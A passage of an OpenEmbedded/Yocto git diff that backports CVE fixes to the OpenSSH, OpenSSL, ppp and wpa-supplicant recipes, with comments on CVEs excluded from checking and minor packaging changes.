++ if (options.user != NULL && !valid_ruser(options.user))
++ fatal("remote username contains invalid characters");
+ host_arg = xstrdup(host);
+
+ /* Initialize the command to execute on remote host. */
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd.socket b/meta/recipes-connectivity/openssh/openssh/sshd.socket
index 12c39b26b5..8d76d62309 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd.socket
+++ b/meta/recipes-connectivity/openssh/openssh/sshd.socket
@@ -1,5 +1,6 @@
[Unit]
Conflicts=sshd.service
+Wants=sshdgenkeys.service
[Socket]
ExecStartPre=@BASE_BINDIR@/mkdir -p /var/run/sshd
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd@.service b/meta/recipes-connectivity/openssh/openssh/sshd@.service
index 9d83dfb2bb..422450c7a1 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd@.service
+++ b/meta/recipes-connectivity/openssh/openssh/sshd@.service
@@ -1,13 +1,11 @@
[Unit]
Description=OpenSSH Per-Connection Daemon
-Wants=sshdgenkeys.service
After=sshdgenkeys.service
[Service]
Environment="SSHD_OPTS="
EnvironmentFile=-/etc/default/ssh
ExecStart=-@SBINDIR@/sshd -i $SSHD_OPTS
-ExecReload=@BASE_BINDIR@/kill -HUP $MAINPID
StandardInput=socket
StandardError=syslog
KillMode=process
diff --git a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
index fe94f30503..9d6cf7da6c 100644
--- a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
+++ b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
@@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \
and for executing commands on a remote machine."
HOMEPAGE = "http://www.openssh.com/"
SECTION = "console/network"
-LICENSE = "BSD & ISC & MIT"
+LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT"
LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3"
DEPENDS = "zlib openssl virtual/crypt"
@@ -24,14 +24,63 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar
file://fix-potential-signed-overflow-in-pointer-arithmatic.patch \
file://sshd_check_keys \
file://add-test-support-for-busybox.patch \
+ file://CVE-2020-14145.patch \
+ file://CVE-2021-28041.patch \
+ file://CVE-2021-41617.patch \
+ file://CVE-2023-38408-01.patch \
+ file://CVE-2023-38408-02.patch \
+ file://CVE-2023-38408-03.patch \
+ file://CVE-2023-38408-04.patch \
+ file://CVE-2023-38408-05.patch \
+ file://CVE-2023-38408-06.patch \
+ file://CVE-2023-38408-07.patch \
+ file://CVE-2023-38408-08.patch \
+ file://CVE-2023-38408-09.patch \
+ file://CVE-2023-38408-10.patch \
+ file://CVE-2023-38408-11.patch \
+ file://CVE-2023-38408-12.patch \
+ file://CVE-2023-48795.patch \
+ file://CVE-2023-51385.patch \
"
SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091"
SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671"
+# This CVE is specific to OpenSSH with the pam opie which we don't build/use here
+CVE_CHECK_WHITELIST += "CVE-2007-2768"
+
# This CVE is specific to OpenSSH server, as used in Fedora and Red Hat Enterprise Linux 7
# and when running in a Kerberos environment. As such it is not relevant to OpenEmbedded
CVE_CHECK_WHITELIST += "CVE-2014-9278"
+# As per upstream, because of the way scp is based on a historical protocol called rcp
+# which relies on that style of argument passing and therefore encounters expansion
+# problems. Making changes to how the scp command line works breaks the pattern used
+# by scp consumers. Upstream therefore recommends the use of rsync in the place of
+# scp for better security. https://bugzilla.redhat.com/show_bug.cgi?id=1860487
+CVE_CHECK_WHITELIST += "CVE-2020-15778"
+
+# CVE-2008-3844 was reported in OpenSSH on Red Hat Enterprise Linux and
+# certain packages may have been compromised. This CVE is not applicable
+# as our source is OpenBSD. https://securitytracker.com/id?1020730
+# https://www.securityfocus.com/bid/30794
+CVE_CHECK_WHITELIST += "CVE-2008-3844"
+
+# openssh-ssh1 is provided for compatibility with old devices that
+# cannot be upgraded to modern protocols. Thus they may not provide security
+# support for this package because doing so would prevent access to equipment.
+# The upstream OpenSSH developers see this as an important
+# security feature and do not intend to 'fix' it.
+# https://security-tracker.debian.org/tracker/CVE-2016-20012
+# https://ubuntu.com/security/CVE-2016-20012
+CVE_CHECK_WHITELIST += "CVE-2016-20012"
+
+# As per debian, the issue is fixed by a feature called "agent restriction" in openssh 8.9
+# Urgency is unimportant as per debian, Hence this CVE is whitelisting.
+# https://security-tracker.debian.org/tracker/CVE-2021-36368
+# https://bugzilla.mindrot.org/show_bug.cgi?id=3316#c2
+# https://docs.ssh-mitm.at/trivialauth.html
+CVE_CHECK_WHITELIST += "CVE-2021-36368"
+
PAM_SRC_URI = "file://sshd"
inherit manpages useradd update-rc.d update-alternatives systemd
@@ -155,12 +204,17 @@ FILES_${PN}-sftp-server = "${libexecdir}/sftp-server"
FILES_${PN}-misc = "${bindir}/ssh* ${libexecdir}/ssh*"
FILES_${PN}-keygen = "${bindir}/ssh-keygen"
-RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen"
+RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen ${PN}-sftp-server"
RDEPENDS_${PN}-sshd += "${PN}-keygen ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-keyinit pam-plugin-loginuid', '', d)}"
RRECOMMENDS_${PN}-sshd_append_class-target = "\
${@bb.utils.filter('PACKAGECONFIG', 'rng-tools', d)} \
"
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS:${PN}-dev = ""
+
# gdb would make attach-ptrace test pass rather than skip but not worth the build dependencies
RDEPENDS_${PN}-ptest += "${PN}-sftp ${PN}-misc ${PN}-sftp-server make sed sudo coreutils"
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
new file mode 100644
index 0000000000..e2a65d0998
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
@@ -0,0 +1,38 @@
+From 679ae2f72ef8cf37609cb0eff5de3b98aa85e395 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Thu, 20 Jul 2023 04:14:42 -1000
+Subject: [PATCH] Configure: add 2 missing key sorts in generation of unified_info
+
+Otherwise generation of this section in configdata.pm is not reproducible
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Backport [adapted from 3.x commit https://github.com/openssl/openssl/commit/764cf5b26306a8712e8b3d41599c44dc5ed07a25]
+---
+ Configure | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Configure b/Configure
+index 2a01746..8fc5a2c 100755
+--- a/Configure
++++ b/Configure
+@@ -2326,7 +2326,7 @@ EOF
+ "dso" => [ @{$unified_info{engines}} ],
+ "bin" => [ @{$unified_info{programs}} ],
+ "script" => [ @{$unified_info{scripts}} ] );
+- foreach my $type (keys %loopinfo) {
++ foreach my $type (sort keys %loopinfo) {
+ foreach my $product (@{$loopinfo{$type}}) {
+ my %dirs = ();
+ my $pd = dirname($product);
+@@ -2347,7 +2347,7 @@ EOF
+ push @{$unified_info{dirinfo}->{$d}->{deps}}, $_
+ if $d ne $pd;
+ }
+- foreach (keys %dirs) {
++ foreach (sort keys %dirs) {
+ push @{$unified_info{dirinfo}->{$_}->{products}->{$type}},
+ $product;
+ }
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
new file mode 100644
index 0000000000..b3f6a942d5
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
@@ -0,0 +1,37 @@
+From 326909baf81a638d51fa8be1d8227518784f5cc4 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Tue, 14 Sep 2021 12:18:25 +0200
+Subject: [PATCH] Configure: do not tweak mips cflags
+
+This conflicts with mips machine definitons from yocto,
+e.g.
+| Error: -mips3 conflicts with the other architecture options, which imply -mips64r2
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ Configure | 10 ----------
+ 1 file changed, 10 deletions(-)
+
+Index: openssl-3.0.4/Configure
+===================================================================
+--- openssl-3.0.4.orig/Configure
++++ openssl-3.0.4/Configure
+@@ -1243,16 +1243,6 @@ if ($target =~ /^mingw/ && `$config{CC} --target-help 2>&1` =~ m/-mno-cygwin/m)
+ push @{$config{shared_ldflag}}, "-mno-cygwin";
+ }
+
+-if ($target =~ /linux.*-mips/ && !$disabled{asm}
+- && !grep { $_ =~ /-m(ips|arch=)/ } (@{$config{CFLAGS}})) {
+- # minimally required architecture flags for assembly modules
+- my $value;
+- $value = '-mips2' if ($target =~ /mips32/);
+- $value = '-mips3' if ($target =~ /mips64/);
+- unshift @{$config{cflags}}, $value;
+- unshift @{$config{cxxflags}}, $value if $config{CXX};
+-}
+-
+ # If threads aren't disabled, check how possible they are
+ unless ($disabled{threads}) {
+ if ($auto_threads) {
diff --git a/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
new file mode 100644
index 0000000000..3da6879ccb
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 09df4395b5071217b76dc7d3d2e630eb8c5a79c2 Mon Sep 17 00:00:00 2001
+From: Matt Caswell <matt@openssl.org>
+Date: Fri, 19 Jan 2024 11:28:58 +0000
+Subject: [PATCH] Add NULL checks where ContentInfo data can be NULL
+
+PKCS12 structures contain PKCS7 ContentInfo fields. These fields are
+optional and can be NULL even if the "type" is a valid value. OpenSSL
+was not properly accounting for this and a NULL dereference can occur
+causing a crash.
+
+CVE-2024-0727
+
+Reviewed-by: Tomas Mraz <tomas@openssl.org>
+Reviewed-by: Hugo Landau <hlandau@openssl.org>
+Reviewed-by: Neil Horman <nhorman@openssl.org>
+(Merged from https://github.com/openssl/openssl/pull/23362)
+
+(cherry picked from commit d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c)
+
+Upstream-Status: Backport [https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c]
+
+CVE: CVE-2024-0727
+
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ crypto/pkcs12/p12_add.c | 18 ++++++++++++++++++
+ crypto/pkcs12/p12_mutl.c | 5 +++++
+ crypto/pkcs12/p12_npas.c | 5 +++--
+ crypto/pkcs7/pk7_mime.c | 7 +++++--
+ 4 files changed, 31 insertions(+), 4 deletions(-)
+
+--- a/crypto/pkcs12/p12_add.c
++++ b/crypto/pkcs12/p12_add.c
+@@ -76,6 +76,13 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ PKCS12_R_CONTENT_TYPE_NOT_DATA);
+ return NULL;
+ }
++
++ if (p7->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA,
++ PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return ASN1_item_unpack(p7->d.data, ASN1_ITEM_rptr(PKCS12_SAFEBAGS));
+ }
+
+@@ -132,6 +139,12 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ {
+ if (!PKCS7_type_is_encrypted(p7))
+ return NULL;
++
++ if (p7->d.encrypted == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA, PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return PKCS12_item_decrypt_d2i(p7->d.encrypted->enc_data->algorithm,
+ ASN1_ITEM_rptr(PKCS12_SAFEBAGS),
+ pass, passlen,
+@@ -159,6 +172,13 @@ STACK_OF(PKCS7) *PKCS12_unpack_authsafes
+ PKCS12_R_CONTENT_TYPE_NOT_DATA);
+ return NULL;
+ }
++
++ if (p12->authsafes->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_AUTHSAFES,
++ PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return ASN1_item_unpack(p12->authsafes->d.data,
+ ASN1_ITEM_rptr(PKCS12_AUTHSAFES));
+ }
+--- a/crypto/pkcs12/p12_mutl.c
++++ b/crypto/pkcs12/p12_mutl.c
+@@ -93,6 +93,11 @@ static int pkcs12_gen_mac(PKCS12 *p12, c
+ return 0;
+ }
+
++ if (p12->authsafes->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_DECODE_ERROR);
++ return 0;
++ }
++
+ salt = p12->mac->salt->data;
+ saltlen = p12->mac->salt->length;
+ if (!p12->mac->iter)
+--- a/crypto/pkcs12/p12_npas.c
++++ b/crypto/pkcs12/p12_npas.c
+@@ -78,8 +78,9 @@ static int newpass_p12(PKCS12 *p12, cons
+ bags = PKCS12_unpack_p7data(p7);
+ } else if (bagnid == NID_pkcs7_encrypted) {
+ bags = PKCS12_unpack_p7encdata(p7, oldpass, -1);
+- if (!alg_get(p7->d.encrypted->enc_data->algorithm,
+- &pbe_nid, &pbe_iter, &pbe_saltlen))
++ if (p7->d.encrypted == NULL
++ || !alg_get(p7->d.encrypted->enc_data->algorithm,
++ &pbe_nid, &pbe_iter, &pbe_saltlen))
+ goto err;
+ } else {
+ continue;
+--- a/crypto/pkcs7/pk7_mime.c
++++ b/crypto/pkcs7/pk7_mime.c
+@@ -30,10 +30,13 @@ int SMIME_write_PKCS7(BIO *bio, PKCS7 *p
+ {
+ STACK_OF(X509_ALGOR) *mdalgs;
+ int ctype_nid = OBJ_obj2nid(p7->type);
+- if (ctype_nid == NID_pkcs7_signed)
++ if (ctype_nid == NID_pkcs7_signed) {
++ if (p7->d.sign == NULL)
++ return 0;
+ mdalgs = p7->d.sign->md_algs;
+- else
++ } else {
+ mdalgs = NULL;
++ }
+
+ flags ^= SMIME_OLDMIME;
+
diff --git a/meta/recipes-connectivity/openssl/openssl/reproducibility.patch b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
new file mode 100644
index 0000000000..8accbc9df2
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
@@ -0,0 +1,22 @@
+Using localtime() means the output can depend on the timezone of the build machine.
+Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Upstream-Status: Pending [should be suitable]
+
+Index: openssl-3.0.1/apps/progs.pl
+===================================================================
+--- openssl-3.0.1.orig/apps/progs.pl
++++ openssl-3.0.1/apps/progs.pl
+@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or
+ my %commands = ();
+ my $cmdre = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/;
+ my $apps_openssl = shift @ARGV;
+-my $YEAR = [localtime()]->[5] + 1900;
++my $YEAR = [gmtime()]->[5] + 1900;
++if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) {
++ $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900;
++}
+
+ # because the program apps/openssl has object files as sources, and
+ # they then have the corresponding C files as source, we need to chain
diff --git a/meta/recipes-connectivity/openssl/openssl_1.1.1g.bb b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
index 815955837b..0e490eabc3 100644
--- a/meta/recipes-connectivity/openssl/openssl_1.1.1g.bb
+++ b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
@@ -17,13 +17,17 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \
file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \
file://afalg.patch \
file://reproducible.patch \
+ file://reproducibility.patch \
+ file://0001-Configure-add-2-missing-key-sorts.patch \
+ file://0001-Configure-do-not-tweak-mips-cflags.patch \
+ file://CVE-2024-0727.patch \
"
SRC_URI_append_class-nativesdk = " \
file://environment.d-openssl.sh \
"
-SRC_URI[sha256sum] = "ddb04774f1e32f0c49751e21b67216ac87852ceb056b75209af2443400636d46"
+SRC_URI[sha256sum] = "cf3098950cb4d853ad95c0841f1f9c6d3dc102dccfcacd521d93925208b76ac8"
inherit lib_package multilib_header multilib_script ptest
MULTILIB_SCRIPTS = "${PN}-bin:${bindir}/c_rehash"
@@ -179,6 +183,7 @@ do_install_ptest () {
install -m755 ${B}/apps/CA.pl ${D}${PTEST_PATH}/apps
install -d ${D}${PTEST_PATH}/engines
+ install -m755 ${B}/engines/dasync.so ${D}${PTEST_PATH}/engines
install -m755 ${B}/engines/ossltest.so ${D}${PTEST_PATH}/engines
}
@@ -210,6 +215,8 @@ BBCLASSEXTEND = "native nativesdk"
CVE_PRODUCT = "openssl:openssl"
+CVE_VERSION_SUFFIX = "alphabetical"
+
# Only affects OpenSSL >= 1.1.1 in combination with Apache < 2.4.37
# Apache in meta-webserver is already recent enough
CVE_CHECK_WHITELIST += "CVE-2019-0190"
diff --git a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
index b5f68951d7..b0097aa480 100644
--- a/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
+++ b/meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Enables PPP dial-in through a serial connection"
SECTION = "console/network"
+DESCRIPTION = "PPP dail-in provides a point to point protocol (PPP), so that other computers can dial up to it and access connected networks."
DEPENDS = "ppp"
RDEPENDS_${PN} = "ppp"
PR = "r8"
diff --git a/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
new file mode 100644
index 0000000000..27b8863a4e
--- /dev/null
+++ b/meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch
@@ -0,0 +1,50 @@
+From 2aeb41a9a3a43b11b1e46628d0bf98197ff9f141 Mon Sep 17 00:00:00 2001
+From: Paul Mackerras <paulus@ozlabs.org>
+Date: Thu, 29 Dec 2022 18:00:20 +0100
+Subject: [PATCH] pppdump: Avoid out-of-range access to packet buffer
+
+This fixes a potential vulnerability where data is written to spkt.buf
+and rpkt.buf without a check on the array index. To fix this, we
+check the array index (pkt->cnt) before storing the byte or
+incrementing the count. This also means we no longer have a potential
+signed integer overflow on the increment of pkt->cnt.
+
+Fortunately, pppdump is not used in the normal process of setting up a
+PPP connection, is not installed setuid-root, and is not invoked
+automatically in any scenario that I am aware of.
+
+Ustream-Status: Backport [https://github.com/ppp-project/ppp/commit/a75fb7b198eed50d769c80c36629f38346882cbf]
+CVE: CVE-2022-4603
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+---
+ pppdump/pppdump.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/pppdump/pppdump.c b/pppdump/pppdump.c
+index 87c2e8f..dec4def 100644
+--- a/pppdump/pppdump.c
++++ b/pppdump/pppdump.c
+@@ -296,6 +296,10 @@ dumpppp(f)
+ printf("%s aborted packet:\n ", dir);
+ q = " ";
+ }
++ if (pkt->cnt >= sizeof(pkt->buf)) {
++ printf("%s over-long packet truncated:\n ", dir);
++ q = " ";
++ }
+ nb = pkt->cnt;
+ p = pkt->buf;
+ pkt->cnt = 0;
+@@ -399,7 +403,8 @@ dumpppp(f)
+ c ^= 0x20;
+ pkt->esc = 0;
+ }
+- pkt->buf[pkt->cnt++] = c;
++ if (pkt->cnt < sizeof(pkt->buf))
++ pkt->buf[pkt->cnt++] = c;
+ break;
+ }
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
index 60c56dd0bd..51ec25e660 100644
--- a/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
+++ b/meta/recipes-connectivity/ppp/ppp_2.4.7.bb
@@ -34,6 +34,7 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/${BP}.tar.gz \
file://0001-ppp-Remove-unneeded-include.patch \
file://ppp-2.4.7-DES-openssl.patch \
file://0001-pppd-Fix-bounds-check-in-EAP-code.patch \
+ file://CVE-2022-4603.patch \
"
SRC_URI_append_libc-musl = "\
@@ -42,6 +43,10 @@ SRC_URI_append_libc-musl = "\
SRC_URI[md5sum] = "78818f40e6d33a1d1de68a1551f6595a"
SRC_URI[sha256sum] = "02e0a3dd3e4799e33103f70ec7df75348c8540966ee7c948e4ed8a42bbccfb30"
+# This CVE is specific to a patch applied by Ubuntu that is not used by
+# OpenEmbedded.
+CVE_CHECK_WHITELIST += "CVE-2020-15704"
+
inherit autotools-brokensep systemd
TARGET_CC_ARCH += " ${LDFLAGS}"
diff --git a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
index 67959576e8..5f0a5eac70 100644
--- a/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
+++ b/meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb
@@ -11,7 +11,7 @@ AUTHOR = "Thomas Hood"
HOMEPAGE = "http://packages.debian.org/resolvconf"
RDEPENDS_${PN} = "bash"
-SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/resolvconf.git;protocol=https;branch=unstable \
file://fix-path-for-busybox.patch \
file://99_resolvconf \
"
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
new file mode 100644
index 0000000000..8c90fa3421
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch
@@ -0,0 +1,45 @@
+From 947272febe24a8f0ea828b5b2f35f13c3821901e Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Mon, 9 Nov 2020 11:43:12 +0200
+Subject: [PATCH] P2P: Fix copying of secondary device types for P2P group
+ client
+
+Parsing and copying of WPS secondary device types list was verifying
+that the contents is not too long for the internal maximum in the case
+of WPS messages, but similar validation was missing from the case of P2P
+group information which encodes this information in a different
+attribute. This could result in writing beyond the memory area assigned
+for these entries and corrupting memory within an instance of struct
+p2p_device. This could result in invalid operations and unexpected
+behavior when trying to free pointers from that corrupted memory.
+
+Upstream-Status: Backport
+CVE: CVE-2021-0326
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=947272febe24a8f0ea828b5b2f35f13c3821901e]
+
+Credit to OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=27269
+Fixes: e57ae6e19edf ("P2P: Keep track of secondary device types for peers")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/p2p/p2p.c b/src/p2p/p2p.c
+index a08ba02..079270f 100644
+--- a/src/p2p/p2p.c
++++ b/src/p2p/p2p.c
+@@ -453,6 +453,8 @@ static void p2p_copy_client_info(struct p2p_device *dev,
+ dev->info.config_methods = cli->config_methods;
+ os_memcpy(dev->info.pri_dev_type, cli->pri_dev_type, 8);
+ dev->info.wps_sec_dev_type_list_len = 8 * cli->num_sec_dev_types;
++ if (dev->info.wps_sec_dev_type_list_len > WPS_SEC_DEV_TYPE_MAX_LEN)
++ dev->info.wps_sec_dev_type_list_len = WPS_SEC_DEV_TYPE_MAX_LEN;
+ os_memcpy(dev->info.wps_sec_dev_type_list, cli->sec_dev_types,
+ dev->info.wps_sec_dev_type_list_len);
+ }
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
new file mode 100644
index 0000000000..004b1dbd19
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch
@@ -0,0 +1,58 @@
+From 8460e3230988ef2ec13ce6b69b687e941f6cdb32 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <jouni@codeaurora.org>
+Date: Tue, 8 Dec 2020 23:52:50 +0200
+Subject: [PATCH] P2P: Fix a corner case in peer addition based on PD Request
+
+p2p_add_device() may remove the oldest entry if there is no room in the
+peer table for a new peer. This would result in any pointer to that
+removed entry becoming stale. A corner case with an invalid PD Request
+frame could result in such a case ending up using (read+write) freed
+memory. This could only by triggered when the peer table has reached its
+maximum size and the PD Request frame is received from the P2P Device
+Address of the oldest remaining entry and the frame has incorrect P2P
+Device Address in the payload.
+
+Fix this by fetching the dev pointer again after having called
+p2p_add_device() so that the stale pointer cannot be used.
+
+Fixes: 17bef1e97a50 ("P2P: Add peer entry based on Provision Discovery Request")
+Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-27803
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=8460e3230988ef2ec13ce6b69b687e941f6cdb32]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/p2p/p2p_pd.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/src/p2p/p2p_pd.c b/src/p2p/p2p_pd.c
+index 3994ec0..05fd593 100644
+--- a/src/p2p/p2p_pd.c
++++ b/src/p2p/p2p_pd.c
+@@ -595,14 +595,12 @@ void p2p_process_prov_disc_req(struct p2p_data *p2p, const u8 *sa,
+ goto out;
+ }
+
++ dev = p2p_get_device(p2p, sa);
+ if (!dev) {
+- dev = p2p_get_device(p2p, sa);
+- if (!dev) {
+- p2p_dbg(p2p,
+- "Provision Discovery device not found "
+- MACSTR, MAC2STR(sa));
+- goto out;
+- }
++ p2p_dbg(p2p,
++ "Provision Discovery device not found "
++ MACSTR, MAC2STR(sa));
++ goto out;
+ }
+ } else if (msg.wfd_subelems) {
+ wpabuf_free(dev->info.wfd_subelems);
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
new file mode 100644
index 0000000000..e2540fc26b
--- /dev/null
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch
@@ -0,0 +1,123 @@
+From a0541334a6394f8237a4393b7372693cd7e96f15 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Sat, 13 Mar 2021 18:19:31 +0200
+Subject: [PATCH] ASN.1: Validate DigestAlgorithmIdentifier parameters
+
+The supported hash algorithms do not use AlgorithmIdentifier parameters.
+However, there are implementations that include NULL parameters in
+addition to ones that omit the parameters. Previous implementation did
+not check the parameters value at all which supported both these cases,
+but did not reject any other unexpected information.
+
+Use strict validation of digest algorithm parameters and reject any
+unexpected value when validating a signature. This is needed to prevent
+potential forging attacks.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+
+Upstream-Status: Backport
+CVE: CVE-2021-30004
+
+Reference to upstream patch:
+[https://w1.fi/cgit/hostap/commit/?id=a0541334a6394f8237a4393b7372693cd7e96f15]
+
+Signed-off-by: Stefan Ghinea <stefan.ghinea@windriver.com>
+---
+ src/tls/pkcs1.c | 21 +++++++++++++++++++++
+ src/tls/x509v3.c | 20 ++++++++++++++++++++
+ 2 files changed, 41 insertions(+)
+
+diff --git a/src/tls/pkcs1.c b/src/tls/pkcs1.c
+index 141ac50..e09db07 100644
+--- a/src/tls/pkcs1.c
++++ b/src/tls/pkcs1.c
+@@ -240,6 +240,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestInfo",
++ hdr.payload, hdr.length);
+
+ pos = hdr.payload;
+ end = pos + hdr.length;
+@@ -261,6 +263,8 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: DigestAlgorithmIdentifier",
++ hdr.payload, hdr.length);
+ da_end = hdr.payload + hdr.length;
+
+ if (asn1_get_oid(hdr.payload, hdr.length, &oid, &next)) {
+@@ -269,6 +273,23 @@ int pkcs1_v15_sig_ver(struct crypto_public_key *pk,
+ os_free(decrypted);
+ return -1;
+ }
++ wpa_hexdump(MSG_MSGDUMP, "PKCS #1: Digest algorithm parameters",
++ next, da_end - next);
++
++ /*
++ * RFC 5754: The correct encoding for the SHA2 algorithms would be to
++ * omit the parameters, but there are implementation that encode these
++ * as a NULL element. Allow these two cases and reject anything else.
++ */
++ if (da_end > next &&
++ (asn1_get_next(next, da_end - next, &hdr) < 0 ||
++ !asn1_is_null(&hdr) ||
